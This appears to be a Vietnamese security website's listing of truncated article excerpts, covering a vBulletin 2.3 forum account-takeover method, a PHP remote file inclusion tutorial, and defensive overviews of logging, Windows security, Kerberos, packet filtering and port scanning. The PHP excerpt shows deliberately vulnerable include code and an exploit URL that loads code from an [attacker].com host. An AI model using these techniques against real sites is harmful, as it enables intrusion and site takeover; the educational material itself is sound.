Hack Forum Vbulettin Board

Cách này áp dụng chung cho tất cả các forum nào không đòi hỏi phải điền mật khẩu khi change email và đây là cách để hack forum vbb 2.3 trở xuống vì trong phiên bản mới 3.0 của vbb đã yêu cầu nhập password khi change email .
Bước 1 : tạo 1 file đặt [...]

PHP File Include

1/ Include remote file:
a/ Lỗi đơn giản:
|———BEGIN of test.php——-
<?php
$ex=”/home/www/testsite”;
include(“$ex/index.php”);
[…]
?>
———-END of test.php———|
Đoạn code trên không có vấn đề gì . Nhưng:
|———BEGIN of test.php——-
<?php
include(“$ex/index.php”);
[…]
?>
———-END of test.php———|
__ Bạn nói sao? ừ 100% là trang này đã bị lỗi File include. Chúng ta có thể khai thác bằng cách sữ dụng link sao:
http://www.[target].com/test.php?ex=http://www.[attacker].com/
__ Link này sẽ include file http://www.[attacker].com/index.php. [...]

Xây dựng các ứng dụng bảo mật: nhất quán bản ghi

Bài này chúng tôi sẽ khảo sát nghiên cứu trạng thái ghi của lớp ứng dụng đã được nghiên cứu qua nhiều năm kinh nghiệm trong thực hiện phân tích bảo mật mã nguồn đối với hàng triệu dòng mã.
Việc ghi chép hiệu quả thường bị bỏ qua bởi vấn đề bảo mật ứng [...]

Tổng quan về bảo mật cho hệ thống Windows

Tổng quan về bảo mật cho hệ thống Windows
Một trong những yếu tố quan tâm hàng đầu trong việc Thiết kế Security một hệ thống thông tin đó là kiểm soát chặt chẽ tất cả Computer của tổ chức. Vì chúng là nơi cất giữ tài sản thông tin có giá trị của tổ chức. [...]

Tìm hiểu về giao thức xác thực Kerberos

Kerberos là một giao thức mật mã dùng để xác thực trong các mạng máy tính hoạt động trên những đường truyền không an toàn. Giao thức Kerberos có khả năng chống lại việc nghe lén hay gửi lại các gói tin cũ và đảm bảo tính toàn vẹn của dữ liệu. Mục tiêu khi [...]

Control ActiveX

Static fillter packet
Nói chung, một router (bộ định tuyến) là một thiết bị liên mạng chuyên dụng vốn chạy một hệ điều hành chuyên biệt (Ví dụ như Cisco IOS) để chuyển các gói giữa hai hoặc nhiều đoạn mạng được tách biệt. Nó hoạt động tại lớp network của mô hình tham chiếu OSI [...]

Static fillter packet

Trong bài viết này tôi trình bày với các bạn các nguyên tắc Scan Port cơ bản trên hệ thống, những kỹ thuật scan từ đó chúng ta biết trên một hệ thống đang sử dụng những Port nào. Từ những khái niệm về Scan tôi cũng trình bày với các bạn giải pháp ngăn [...]